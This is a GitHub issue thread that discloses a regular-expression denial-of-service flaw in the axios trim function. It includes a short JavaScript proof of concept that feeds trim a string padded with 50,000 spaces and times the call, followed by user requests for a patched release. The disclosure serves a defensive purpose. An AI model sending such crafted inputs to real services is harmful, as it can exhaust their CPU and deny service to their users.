[Security] Regular expression Denial of Service (ReDoS)

[ready-research]

Describe the bug

A ReDoS (regular expression denial of service) flaw was found in the axios package. An attacker that is able to provide crafted input to the trim function may cause an application to consume an excessive amount of CPU.

https://www.huntr.dev/bounties/1e8f07fc-c384-4ff9-8498-0690de2e8c31/

To Reproduce

Code snippet to reproduce, ideally, that will work by pasting into something like https://npm.runkit.com/axios

var {trim} = require("axios/lib/utils");
function build_blank (n) {
var ret = "1"
for (var i = 0; i < n; i++) {
ret += " "
}
return ret + "1";
}
var time = Date.now();
trim(build_blank(50000))
var time_cost = Date.now() - time;
console.log("time_cost: " + time_cost)

Expected behavior

Environment

• Axios Version [e.g. 0.21.1]
• Adapter [e.g. XHR/HTTP]
• Browser [e.g. Chrome, Safari]
• Browser Version [e.g. 22]
• Node.js Version [e.g. 14.17.5]
• OS: [e.g. iOS 12.1.0, OSX 10.13.4]
• Additional Library Versions [e.g. React 16.7, React Native 0.58.0]

Additional context/Screenshots

Add any other context about the problem here. If applicable, add screenshots to help explain.

[ready-research]

Reopened the issue described in #3977, #3978.

[ready-research]

@jasonsaayman Can you please validate this issue?

[zidingz]

@ready-research Please do not disclose security issues publicly, and kindly remove the all details of bug from the public domain, including this issue: #3978

The maintainers of this repo won't be able to access the huntr.dev link provided either. Kindly let us facilitate this process with the axios team. Thank you.

[KrayzeeKev]

Now that this is public, when is the likelihood of a release? I notice Axios has not had a release in 8 months (0.21.1). Our builds are failing security scans and we can only install from published repos (npm).

[jasonsaayman]

I cannot actually process a release, I will speak to @emilyemorehouse to see if we can get one out as soon as possible

[bgdman]

Are there any updates on this? We have similar issues.

[michielmetcake]

I think more and more people are going to ask for this now. Since dependabot indexed this security issue too.

[KrayzeeKev]

I think more and more people are going to ask for this now. Since dependabot indexed this security issue too.

Snyk has flagged it, SourceClear is flagging it.

Any security fix should trigger a release ASAP. At 18.2 million downloads per week, there's going to be a LOT of vulnerable systems out there and a LOT of systems which can no longer build because their mandatory security tools will be blocking them.

[jasonsaayman]

@KrayzeeKev as said above I cannot release the project, I have asked everyone with access the moment that I released this. If there was a way for me to release it I would do so. I have also asked for access to be allowed to process releases.

[KrayzeeKev]

@KrayzeeKev as said above I cannot release the project, I have asked everyone with access the moment that I released this. If there was a way for me to release it I would do so. I have also asked for access to be allowed to process releases.

@jasonsaayman That was in no way intended to be a go at you. Sorry if it came across that way. It was more a comment that the project probably needs a better release cadence. I see various commits and merges into master yet no release in 8 months for something with 18M downloads a week. That's VERY unusual. When 'request' was deprecated we moved to Axios as everybody had good things to say about it and there had been recent releases. It's just those are the same releases we're using today. Given that it consumes the internet, an HTTP library is going to need frequent updating.

Kudos to all concerned for the speed at which this was discovered, fixed and merged. Just one more step...

[jasonsaayman]

Yeah, I have asked for the ability to do the releases, I will see if I obtain this access. If not I will see if I can try get it in another way. I would like to release much more often and be more active but its difficult as we need the ability to do preview releases often and patches more frequently.